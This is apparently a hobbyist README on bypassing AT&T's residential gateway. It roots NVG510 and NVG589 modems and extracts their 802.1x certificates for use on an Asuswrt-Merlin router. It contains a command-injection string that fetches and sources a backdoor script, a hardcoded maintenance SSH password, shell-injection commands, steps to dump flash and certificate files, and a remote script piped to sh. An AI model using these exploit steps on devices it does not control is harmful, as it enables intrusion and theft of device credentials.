BypassAttRG

Using Asuswrt-Merlin to bypass AT&T's residential gateway. (rt-ac68u <--> ~BGW210~ <--> ONT)
This method only requires Asuswrt-Merlin. No pfSense, or netgraph, or ubiquiti devices, or dumb switch needed.
I only tested with rt-ac68u, but the method should work for all Asuswrt-Merlin based wireless routers (Please let me know if it doesn't).
Now, the home router connects optical network terminal(ONT) directly. You should setup the firewall wisely.

Menu

• Prerequisites
• Extract Certificates
• Configuring 802.1x authentication
• Miscellaneous
• Credits & References

Prerequisites

• Python 3 for the local http server. There are many alternatives(e.g. mobaxterm).
• Basic knowledge of POSIX commands (cd, mkdir, wget, etc.).
• A NVG510 or NVG589

Back to menu

Extract Certificates

The certificates extracted from both NVG510 and NVG589 work, however NVG510 costs less and is easier to root.

• NVG510
• NVG589 (maybe NVG599)
• BGW210

NVG510

Rooting

Credit: earlz

• Downgrade firmware to 9.0.6h2d30 if necessary. Known vulnerable firmwares are:
  • NVG510 9.0.6h2d30
  • NVG510 9.0.6h2d21
  • NVG510 9.0.6h048
• Follow this guide Rooting The NVG510 from the WebUI.
  If NVG510 has no connection to internet, you may want to setup a local http server for NVG510 to download the script
  • Download http://earlz.net/static/backdoor.nvg510.sh to your local machine
  • Use Python to setup a simple http server. python -m http.server or python -m SimpleHTTPServer for Python2
  • In the page source of the ATT firmware update page http://192.168.1.254/cgi-bin/update.ha look for the word nonce and copy the value shown in quotes. This value changes every time the page is loaded! Example: 815a0aaa0000176012db85d7d7cac9b31e749a44b6551d02
  • In the text box on the earlz control2 page, change the command to errrr && wget http://YOUR_LOCAL_IP:8000/backdoor.nvg510.sh -O /tmp/backdoor.sh && source /tmp/backdoor.sh && errr
• Login telnet 192.168.1.254 28. The username is admin and the password is your modem's access code written on the label of the modem
• Once connected, type ! to switch to a root shell

Extract Certificates

• Download busybox-mips to your local device.
• Start Python http server. python -m http.server or python -m SimpleHTTPServer for Python2
• In NVG510, wget https://YOUR_LOCAL_IP:8000/busybox-mips -O /tmp/busybox
• chmod +x /tmp/busybox
• /tmp/busybox dd if=/dev/mtdblock4 of=/tmp/mfg.dat bs=1k
• mkdir /tmp/images
• mount -o blind /tmp/images /www/att/images
• cp /tmp/mfg.dat /www/att/images
• cd /tmp
• tar cf cert.tar /etc/rootcert/
• cp cert.tar /www/att/images
• Download http://192.168.1.254/images/mfg.dat and http://192.168.1.254/images/cert.tar to your local device

NVG589

Rooting

Credit: nomotion

• If your firmware version <= 9.1.0h12d15_1.1, the following method may work for you. (I didn't test this method.)
  A complete bricking guide for Motorola/Arris NVG589.
• Otherwise, downgrade(upgrade) to 9.2.2h0d83.
• Reset NVG589 and ssh remotessh@192.168.1.254 (password:5SaP9I26)
  • If ssh is not enabled at this time, upgrade to 9.2.2h4d16 with ONT interface connected to AT&T's ONT.
  • Wait a bit, AT&T may start upgrade your NVG589's firmware.
  • At the time of this writing, it upgraded to 9.2.2h11d22.
  • If not, manually upgrade to 9.2.2h11d22.
  • When you see it is upgrading (power LED turns amber, and other LEDs are off), disconnect ONT cable.
  • Downgrade back to 9.2.2h0d83.
  • Now ssh should be enabled. Please let me know if you find an easier and simpler method.
• In NVG589, run the following commands in order. (Credit: samlii@dslreports)

  ping -c 1 192.168.1.254;echo /bin/nsh >>/etc/shells
  ping -c 1 192.168.1.254;echo /bin/sh >>/etc/shells
  ping -c 1 192.168.1.254;sed -i 's/cshell/nsh/g' /etc/passwd

• Exit exit and shh back ssh remotessh@192.168.1.254 (password:5SaP9I26)
• Type !. It switches to root shell.

Extract Certificates

• In NVG589, run the following commands in order. Make sure you are in root shell.

  mount mtd:mfg -t jffs2 /mfg && cp /mfg/mfg.dat /tmp/ && umount /mfg
  cd /tmp
  tar cf cert.tar /etc/rootcert/
  cp cert.tar /www/att/images
  cp /tmp/mfg.dat /www/att/images

• Download http://192.168.1.254/images/mfg.dat and http://192.168.1.254/images/cert.tar to your local device.

BGW210

Credit: Streiw

• reddit link

Back to menu

Configuring 802.1x authentication

Decode Credentials

Credit: devicelocksmith

• Download decoder v1.0.4: win, linux, mac
  • Original download page
• Copy mfg.dat, unzip cert.tar to the same location as mfg_dat_decode.
• Run mfg_dat_decode. You should get a file like this: EAP-TLS_8021x_XXXX.

Update wpa_supplicant in Asuswrt-Merlin

I cannot use the build-in wpa_supplicant v0.6 in Asuswrt-Merlin to achieve my goal, so I compiled the wpa_supplicant v2.7 from Entware repository. Here I provide the necessary binary files. If you are working on a different model, you may need to compile wpa_supplicant from the source. check this.

• Start python http server. python -m http.server
• ssh to your router. (You need to enable ssh in the web GUI.)
• Download the packages and unzip it. wget https://raw.githubusercontent.com/bypassrg/att/master/packages.tar.gz && tar -xzf packages.tar.gz
• Download EAP-TLS_8021x_XXXX file from your local http server. wget https://YOUR_LOCAL_IP:8000/EAP-TLS_8021x_XXXX.tar.gz
  • Unzip and copy files to /jffs/EAP. mkdir /jffs/EAP && tar xzf EAP-TLS_8021x_XXXX.tar.gz -C /jffs/EAP
  • Modify wpa_supplicant.conf. Set *.pem to the absolute path.

    ca_cert="/jffs/EAP/CA_XXXX.pem"
    client_cert="/jffs/EAP/Client_XXXX.pem"
    private_key="/jffs/EAP/PrivateKey_PKCS1_XXXX.pem"

• Install Entware in your router.
  • Install in the usb drive. Entware
  • Install in jffs. Run this script: entware_jffs.sh
    wget -O - https://raw.githubusercontent.com/bypassrg/att/master/entware_jffs.sh |sh
  • Check your router's architecture uname -rm. If you are not using armv7, you must use the correct Entware installation script.
  • Deploying Entware
  • Replace the URL in entware_jffs.sh accordingly.
• Install wpa_supplicant and dependencies.

  opkg update
  opkg install libubox
  echo -e "\ndest opt /opt" >> /opt/etc/opkg.conf
  opkg install -d opt libubus_2018-10-06-221ce7e7-1_armv7-2.6.ipk
  opkg install -d opt hostapd-common_2018-12-02-c2c6c01b-6_armv7-2.6.ipk
  opkg install -d opt wpa-supplicant_2018-12-02-c2c6c01b-6_armv7-2.6.ipk
  opkg install fake-hwclock
  echo -e "\n/opt/usr/sbin/wpa_supplicant -s -B -Dwired -ieth0 -c/jffs/EAP/wpa_supplicant.conf" >> /opt/etc/init.d/rc.unslung

Configure Asuswrt-Merlin via web GUI

• In WAN tab, set MAC Address to identity value which you can find in wpa_supplicant.conf.
• ~Enable AiProtection.~
  • I guess this sets VLAN tag to the network traffic, so we don't need pfSense or netgraph.
• IPv6: set Connection type to Native

Debug

• If it is the first time to use the certificates, it takes several rounds of authentication. Just wait.
• check /tmp/syslog.log in the router.
• Manually start wpa_supplicant with debug option.
  /opt/usr/sbin/wpa_supplicant -dd -Dwired -ieth0 -c/jffs/EAP/wpa_supplicant.conf

Miscellaneous

Compile Entware packages from source

Some useful links

• Compile-packages-from-sources
• Compile-custom-programs-from-source

FAQ

1. Q: Slow Speed: The speed doesn't reach to the speed that I subscribed to.
   A: Please make sure the NAT acceleration is enabled. (Web GUI -> Tools-> HW acceleration). If it says incompatible with, you need to turn off some services.

Back to menu

Credits & References

• devicelocksmith: EAP-TLS credentials decoder and the method to extract /mfg/mfg.dat
• earlz: Rooting The NVG510 from the WebUI
• nomotion: NVG589 root exploit
• dslreports.com: A great forum with many useful information.
• jsolo1@dslreports.com: Provides many helpful & useful suggestions.

Back to menu